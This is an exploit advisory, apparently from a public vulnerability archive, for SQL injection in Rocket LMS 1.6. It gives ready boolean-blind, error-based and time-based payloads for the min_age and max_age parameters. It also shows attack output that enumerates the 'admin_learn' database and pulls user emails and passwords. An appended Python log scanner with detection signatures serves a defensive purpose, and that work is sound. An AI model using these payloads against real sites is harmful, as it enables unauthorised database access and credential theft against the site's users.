Rocket LMS 1.6 SQL Injection

2022.09.16
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

CraCkEr - The Crack of Eternal Might
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : rocket-soft.org
Vendor    : RocketSoft
Software  : Rocket LMS v 1.6
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Rocket LMS - Learning Management System is an online course marketplace with a pile of features that helps you to run your online education business easily.

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Ivo @palaziv CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022


GET parameter 'min_age' is vulnerable
---
Parameter: min_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---

GET parameter 'max_age' is vulnerable
---
Parameter: max_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---

[+] Starting the Attack

[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: 'admin_learn'

[INFO] fetching tables for database: 'admin_learn'
Database: admin_learn
[184 tables]
[INFO] fetching columns for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[49 columns]

[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[4 entries]

[-] Done
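Added defensive example, not part of the advisory: all three sqlmap techniques reported above leave a non-integer value in a filter parameter that the search form only ever sends as an integer or a blank, so a request-log scanner can flag them by allow-list first and by signature second. The endpoint path /search, client addresses, timestamps and log lines are constructed; the injected values are the advisory's own payloads URL-encoded as a client would send them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Filter-form parameters the application only ever receives as an unsigned
# integer or blank (the form sends "" for an unset filter).
NUMERIC_PARAMS = ("min_age", "max_age", "min_price", "max_price", "category_id", "country_id")
INT_RE = re.compile(r"^\d{0,6}$")

# Signatures of the three sqlmap techniques the advisory reports.
TECHNIQUES = (
    ("boolean-based blind", re.compile(r"\bCASE\s+WHEN\b", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
)

# Apache combined-log prefix: client ident user [timestamp] "GET target HTTP/x"
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')

def inspect_query(target):
    """Return (param, decoded_value, technique) for each numeric filter whose value
    is not a plain integer; technique is 'unclassified' if no signature matches."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS:
        for value in qs.get(name, []):
            if not INT_RE.match(value):  # allow-list first, signature second
                technique = next((t for t, rx in TECHNIQUES if rx.search(value)), "unclassified")
                findings.append((name, value, technique))
    return findings

def scan_access_log(lines):
    """Return (client_ip, param, technique) for every flagged GET request."""
    hits = []
    for m in filter(None, map(REQ_RE.match, lines)):
        hits += [(m.group(1), p, t) for p, _v, t in inspect_query(m.group(2))]
    return hits

# Constructed sample lines (path /search, addresses and timestamps are made up);
# the injected values are the advisory's payloads as a client would URL-encode them.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Sep/2022:10:00:01 +0000] "GET /search?sort=top_rate&min_age=18&max_age=99&day[]=saturday HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Sep/2022:10:00:02 +0000] "GET /search?min_age=18%20AND%20GTID_SUBSET(CONCAT(0x71706a6271,(SELECT%20(ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99 HTTP/1.1" 500 1200',
    '203.0.113.7 - - [16/Sep/2022:10:00:03 +0000] "GET /search?min_age=18&max_age=99%20AND%20(SELECT%202169%20FROM%20(SELECT(SLEEP(5)))mngI) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Sep/2022:10:00:04 +0000] "GET /search?min_age=(SELECT%20(CASE%20WHEN%20(8536=8536)%20THEN%2018%20ELSE%20(SELECT%207625%20UNION%20SELECT%201202)%20END))&max_age=99 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, param, technique in scan_access_log(SAMPLE_LOG):
        print(f"possible SQLi from {client}: parameter {param} ({technique})")
```

The allow-list check is what matters for the fix as well: a value for min_age or max_age that is not a plain integer should be rejected before it reaches a query, and bound as a parameter when it does.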


Copyright 2022, cxsecurity.com